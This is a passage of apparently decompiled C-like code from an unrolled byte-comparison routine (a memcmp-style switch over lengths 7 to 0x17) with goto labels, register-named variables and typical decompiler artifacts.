									goto L411;
								}
								goto L298;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 6) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
							if(__esi == 0) {
								L290:
								__esi =  *(__eax - 5) & 0x000000ff;
								__edx =  *(__ecx - 5) & 0x000000ff;
								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
								if(__esi == 0) {
									L292:
									__esi =  *(__eax - 4) & 0x000000ff;
									__edx =  *(__ecx - 4) & 0x000000ff;
									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
									if(__esi == 0) {
										L294:
										__esi =  *(__eax - 3) & 0x000000ff;
										__edx =  *(__ecx - 3) & 0x000000ff;
										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L297;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L294;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L292;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L290;
						case 7:
							L368:
							__edx =  *(__eax - 7);
							if( *(__eax - 7) ==  *(__ecx - 7)) {
								__esi = 0;
								L378:
								if(__esi != 0) {
									goto L411;
								}
								goto L379;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 7) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
							if(__esi == 0) {
								L371:
								__esi =  *(__eax - 6) & 0x000000ff;
								__edx =  *(__ecx - 6) & 0x000000ff;
								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
								if(__esi == 0) {
									L373:
									__esi =  *(__eax - 5) & 0x000000ff;
									__edx =  *(__ecx - 5) & 0x000000ff;
									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
									if(__esi == 0) {
										L375:
										__esi =  *(__eax - 4) & 0x000000ff;
										__edx =  *(__ecx - 4) & 0x000000ff;
										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L378;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L375;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L373;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L371;
						case 8:
							L422:
							_t1142 =  *(_t987 - 8);
							if(_t1142 ==  *(_t1119 - 8)) {
								_t1206 = 0;
								L442:
								if(_t1206 != 0) {
									goto L411;
								}
								goto L443;
							}
							_t1235 = (_t1142 & 0x000000ff) - ( *(_t1119 - 8) & 0x000000ff);
							if(_t1235 == 0) {
								L425:
								_t1237 = ( *(_t987 - 7) & 0x000000ff) - ( *(_t1119 - 7) & 0x000000ff);
								if(_t1237 != 0) {
									_t1206 = (0 | _t1237 > 0x00000000) + (0 | _t1237 > 0x00000000) - 1;
									if(_t1206 == 0) {
										goto L426;
									}
									goto L411;
								}
								L426:
								_t1239 = ( *(_t987 - 6) & 0x000000ff) - ( *(_t1119 - 6) & 0x000000ff);
								if(_t1239 == 0) {
									L131:
									_t1206 = ( *(_t987 - 5) & 0x000000ff) - ( *(_t1119 - 5) & 0x000000ff);
									if(_t1206 != 0) {
										_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
									}
									goto L442;
								}
								_t1206 = (0 | _t1239 > 0x00000000) + (0 | _t1239 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L131;
							}
							_t1206 = (0 | _t1235 > 0x00000000) + (0 | _t1235 > 0x00000000) - 1;
							if(_t1206 != 0) {
								goto L411;
							}
							goto L425;
						case 9:
							L197:
							__edx =  *(__eax - 9);
							if( *(__eax - 9) ==  *(__ecx - 9)) {
								__esi = 0;
								L207:
								if(__esi != 0) {
									goto L411;
								}
								goto L208;
							}
							__edx =  *(__ecx - 9) & 0x000000ff;
							__esi =  *(__eax - 9) & 0x000000ff;
							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
							if(__esi == 0) {
								L200:
								__esi =  *(__eax - 8) & 0x000000ff;
								__edx =  *(__ecx - 8) & 0x000000ff;
								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
								if(__esi == 0) {
									L202:
									__esi =  *(__eax - 7) & 0x000000ff;
									__edx =  *(__ecx - 7) & 0x000000ff;
									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
									if(__esi == 0) {
										L204:
										__esi =  *(__eax - 6) & 0x000000ff;
										__edx =  *(__ecx - 6) & 0x000000ff;
										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L207;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L204;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L202;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L200;
						case 0xa:
							L276:
							__edx =  *(__eax - 0xa);
							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
								__esi = 0;
								L286:
								if(__esi != 0) {
									goto L411;
								}
								goto L287;
							}
							__edx =  *(__ecx - 0xa) & 0x000000ff;
							__esi =  *(__eax - 0xa) & 0x000000ff;
							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
							if(__esi == 0) {
								L279:
								__edx =  *(__ecx - 9) & 0x000000ff;
								__esi =  *(__eax - 9) & 0x000000ff;
								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
								if(__esi == 0) {
									L281:
									__edx =  *(__ecx - 8) & 0x000000ff;
									__esi =  *(__eax - 8) & 0x000000ff;
									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
									if(__esi == 0) {
										L283:
										__edx =  *(__ecx - 7) & 0x000000ff;
										__esi =  *(__eax - 7) & 0x000000ff;
										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L286;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L283;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L281;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L279;
						case 0xb:
							L357:
							__edx =  *(__eax - 0xb);
							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
								__esi = 0;
								L367:
								if(__esi != 0) {
									goto L411;
								}
								goto L368;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xb) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
							if(__esi == 0) {
								L360:
								__esi =  *(__eax - 0xa) & 0x000000ff;
								__edx =  *(__ecx - 0xa) & 0x000000ff;
								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
								if(__esi == 0) {
									L362:
									__esi =  *(__eax - 9) & 0x000000ff;
									__edx =  *(__ecx - 9) & 0x000000ff;
									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
									if(__esi == 0) {
										L364:
										__esi =  *(__eax - 8) & 0x000000ff;
										__edx =  *(__ecx - 8) & 0x000000ff;
										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L367;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L364;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L362;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L360;
						case 0xc:
							L419:
							if( *(_t987 - 0xc) !=  *(_t1119 - 0xc)) {
								_t1222 = ( *(_t987 - 0xc) & 0x000000ff) - ( *(_t1119 - 0xc) & 0x000000ff);
								if(_t1222 == 0) {
									L123:
									_t1224 = ( *(_t987 - 0xb) & 0x000000ff) - ( *(_t1119 - 0xb) & 0x000000ff);
									if(_t1224 == 0) {
										L125:
										_t1226 = ( *(_t987 - 0xa) & 0x000000ff) - ( *(_t1119 - 0xa) & 0x000000ff);
										if(_t1226 == 0) {
											L127:
											_t1206 = ( *(_t987 - 9) & 0x000000ff) - ( *(_t1119 - 9) & 0x000000ff);
											if(_t1206 != 0) {
												_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
											}
											L421:
											if(_t1206 != 0) {
												goto L411;
											}
											goto L422;
										}
										_t1206 = (0 | _t1226 > 0x00000000) + (0 | _t1226 > 0x00000000) - 1;
										if(_t1206 != 0) {
											goto L411;
										}
										goto L127;
									}
									_t1206 = (0 | _t1224 > 0x00000000) + (0 | _t1224 > 0x00000000) - 1;
									if(_t1206 != 0) {
										goto L411;
									}
									goto L125;
								}
								_t1206 = (0 | _t1222 > 0x00000000) + (0 | _t1222 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L123;
							}
							_t1206 = 0;
							goto L421;
						case 0xd:
							L186:
							__edx =  *(__eax - 0xd);
							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
								__esi = 0;
								L196:
								if(__esi != 0) {
									goto L411;
								}
								goto L197;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xd) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
							if(__esi == 0) {
								L189:
								__esi =  *(__eax - 0xc) & 0x000000ff;
								__edx =  *(__ecx - 0xc) & 0x000000ff;
								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
								if(__esi == 0) {
									L191:
									__esi =  *(__eax - 0xb) & 0x000000ff;
									__edx =  *(__ecx - 0xb) & 0x000000ff;
									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
									if(__esi == 0) {
										L193:
										__esi =  *(__eax - 0xa) & 0x000000ff;
										__edx =  *(__ecx - 0xa) & 0x000000ff;
										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L196;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L193;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L191;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L189;
						case 0xe:
							L265:
							__edx =  *(__eax - 0xe);
							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
								__esi = 0;
								L275:
								if(__esi != 0) {
									goto L411;
								}
								goto L276;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xe) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
							if(__esi == 0) {
								L268:
								__esi =  *(__eax - 0xd) & 0x000000ff;
								__edx =  *(__ecx - 0xd) & 0x000000ff;
								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
								if(__esi == 0) {
									L270:
									__esi =  *(__eax - 0xc) & 0x000000ff;
									__edx =  *(__ecx - 0xc) & 0x000000ff;
									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
									if(__esi == 0) {
										L272:
										__esi =  *(__eax - 0xb) & 0x000000ff;
										__edx =  *(__ecx - 0xb) & 0x000000ff;
										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L275;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L272;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L270;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L268;
						case 0xf:
							L346:
							__edx =  *(__eax - 0xf);
							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
								__esi = 0;
								L356:
								if(__esi != 0) {
									goto L411;
								}
								goto L357;
							}
							__edx =  *(__ecx - 0xf) & 0x000000ff;
							__esi =  *(__eax - 0xf) & 0x000000ff;
							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
							if(__esi == 0) {
								L349:
								__esi =  *(__eax - 0xe) & 0x000000ff;
								__edx =  *(__ecx - 0xe) & 0x000000ff;
								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
								if(__esi == 0) {
									L351:
									__esi =  *(__eax - 0xd) & 0x000000ff;
									__edx =  *(__ecx - 0xd) & 0x000000ff;
									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
									if(__esi == 0) {
										L353:
										__esi =  *(__eax - 0xc) & 0x000000ff;
										__edx =  *(__ecx - 0xc) & 0x000000ff;
										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L356;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L353;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L351;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L349;
						case 0x10:
							L416:
							_t1126 =  *(_t987 - 0x10);
							if(_t1126 !=  *(_t1119 - 0x10)) {
								_t1215 = (_t1126 & 0x000000ff) - ( *(_t1119 - 0x10) & 0x000000ff);
								if(_t1215 != 0) {
									_t1206 = (0 | _t1215 > 0x00000000) + (0 | _t1215 > 0x00000000) - 1;
									if(_t1206 == 0) {
										goto L434;
									} else {
										goto L411;
									}
								}
								L434:
								_t1217 = ( *(_t987 - 0xf) & 0x000000ff) - ( *(_t1119 - 0xf) & 0x000000ff);
								if(_t1217 != 0) {
									_t1206 = (0 | _t1217 > 0x00000000) + (0 | _t1217 > 0x00000000) - 1;
									if(_t1206 == 0) {
										goto L435;
									} else {
										goto L411;
									}
								}
								L435:
								_t1219 = ( *(_t987 - 0xe) & 0x000000ff) - ( *(_t1119 - 0xe) & 0x000000ff);
								if(_t1219 == 0) {
									L119:
									_t1206 = ( *(_t987 - 0xd) & 0x000000ff) - ( *(_t1119 - 0xd) & 0x000000ff);
									if(_t1206 != 0) {
										_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
									}
									L418:
									if(_t1206 != 0) {
										goto L411;
									}
									goto L419;
								}
								_t1206 = (0 | _t1219 > 0x00000000) + (0 | _t1219 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L119;
							}
							_t1206 = 0;
							goto L418;
						case 0x11:
							L175:
							__edx =  *(__eax - 0x11);
							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
								__esi = 0;
								L185:
								if(__esi != 0) {
									goto L411;
								}
								goto L186;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x11) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
							if(__esi == 0) {
								L178:
								__esi =  *(__eax - 0x10) & 0x000000ff;
								__edx =  *(__ecx - 0x10) & 0x000000ff;
								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
								if(__esi == 0) {
									L180:
									__esi =  *(__eax - 0xf) & 0x000000ff;
									__edx =  *(__ecx - 0xf) & 0x000000ff;
									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
									if(__esi == 0) {
										L182:
										__esi =  *(__eax - 0xe) & 0x000000ff;
										__edx =  *(__ecx - 0xe) & 0x000000ff;
										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L185;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L182;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L180;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L178;
						case 0x12:
							L254:
							__edx =  *(__eax - 0x12);
							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
								__esi = 0;
								L264:
								if(__esi != 0) {
									goto L411;
								}
								goto L265;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x12) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
							if(__esi == 0) {
								L257:
								__esi =  *(__eax - 0x11) & 0x000000ff;
								__edx =  *(__ecx - 0x11) & 0x000000ff;
								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
								if(__esi == 0) {
									L259:
									__esi =  *(__eax - 0x10) & 0x000000ff;
									__edx =  *(__ecx - 0x10) & 0x000000ff;
									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
									if(__esi == 0) {
										L261:
										__esi =  *(__eax - 0xf) & 0x000000ff;
										__edx =  *(__ecx - 0xf) & 0x000000ff;
										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L264;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L261;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L259;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L257;
						case 0x13:
							L335:
							__edx =  *(__eax - 0x13);
							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
								__esi = 0;
								L345:
								if(__esi != 0) {
									goto L411;
								}
								goto L346;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x13) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
							if(__esi == 0) {
								L338:
								__esi =  *(__eax - 0x12) & 0x000000ff;
								__edx =  *(__ecx - 0x12) & 0x000000ff;
								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
								if(__esi == 0) {
									L340:
									__esi =  *(__eax - 0x11) & 0x000000ff;
									__edx =  *(__ecx - 0x11) & 0x000000ff;
									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
									if(__esi == 0) {
										L342:
										__esi =  *(__eax - 0x10) & 0x000000ff;
										__edx =  *(__ecx - 0x10) & 0x000000ff;
										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L345;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L342;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L340;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L338;
						case 0x14:
							L408:
							_t1125 =  *(_t987 - 0x14);
							if(_t1125 ==  *(_t1119 - 0x14)) {
								_t1206 = 0;
								L415:
								if(_t1206 != 0) {
									goto L411;
								}
								goto L416;
							}
							_t1242 = (_t1125 & 0x000000ff) - ( *(_t1119 - 0x14) & 0x000000ff);
							if(_t1242 == 0) {
								L429:
								_t1244 = ( *(_t987 - 0x13) & 0x000000ff) - ( *(_t1119 - 0x13) & 0x000000ff);
								if(_t1244 != 0) {
									_t1206 = (0 | _t1244 > 0x00000000) + (0 | _t1244 > 0x00000000) - 1;
									if(_t1206 == 0) {
										goto L430;
									} else {
										goto L411;
									}
								}
								L430:
								_t1246 = ( *(_t987 - 0x12) & 0x000000ff) - ( *(_t1119 - 0x12) & 0x000000ff);
								if(_t1246 == 0) {
									L113:
									_t1206 = ( *(_t987 - 0x11) & 0x000000ff) - ( *(_t1119 - 0x11) & 0x000000ff);
									if(_t1206 != 0) {
										_t1206 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
									}
									goto L415;
								}
								_t1206 = (0 | _t1246 > 0x00000000) + (0 | _t1246 > 0x00000000) - 1;
								if(_t1206 != 0) {
									goto L411;
								}
								goto L113;
							}
							_t1206 = (0 | _t1242 > 0x00000000) + (0 | _t1242 > 0x00000000) - 1;
							if(_t1206 == 0) {
								goto L429;
							}
							goto L411;
						case 0x15:
							L164:
							__edx =  *(__eax - 0x15);
							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
								__esi = 0;
								L174:
								if(__esi != 0) {
									goto L411;
								}
								goto L175;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x15) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
							if(__esi == 0) {
								L167:
								__esi =  *(__eax - 0x14) & 0x000000ff;
								__edx =  *(__ecx - 0x14) & 0x000000ff;
								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
								if(__esi == 0) {
									L169:
									__esi =  *(__eax - 0x13) & 0x000000ff;
									__edx =  *(__ecx - 0x13) & 0x000000ff;
									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
									if(__esi == 0) {
										L171:
										__esi =  *(__eax - 0x12) & 0x000000ff;
										__edx =  *(__ecx - 0x12) & 0x000000ff;
										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L174;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L171;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L169;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L167;
						case 0x16:
							L243:
							__edx =  *(__eax - 0x16);
							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
								__esi = 0;
								L253:
								if(__esi != 0) {
									goto L411;
								}
								goto L254;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x16) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
							if(__esi == 0) {
								L246:
								__esi =  *(__eax - 0x15) & 0x000000ff;
								__edx =  *(__ecx - 0x15) & 0x000000ff;
								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
								if(__esi == 0) {
									L248:
									__esi =  *(__eax - 0x14) & 0x000000ff;
									__edx =  *(__ecx - 0x14) & 0x000000ff;
									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
									if(__esi == 0) {
										L250:
										__esi =  *(__eax - 0x13) & 0x000000ff;
										__edx =  *(__ecx - 0x13) & 0x000000ff;
										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
										if(__esi != 0) {
											0 = 0 | __esi > 0x00000000;
											__edx = (__esi > 0) + (__esi > 0) - 1;
											__esi = (__esi > 0) + (__esi > 0) - 1;
										}
										goto L253;
									}
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = __edx;
									if(__edx != 0) {
										goto L411;
									}
									goto L250;
								}
								0 = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								__esi = __edx;
								if(__edx != 0) {
									goto L411;
								}
								goto L248;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L411;
							}
							goto L246;
						case 0x17:
							L324:
							__edx =  *(__eax - 0x17);
							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
								__esi = 0;
								L334:
								if(__esi != 0) {
									goto L411;
								}
								goto L335;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x17) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
							if(__esi == 0) {
								L327:
								__esi =  *(__eax - 0x16) & 0x000000ff;
								__edx =  *(__ecx - 0x16) & 0x000000ff;
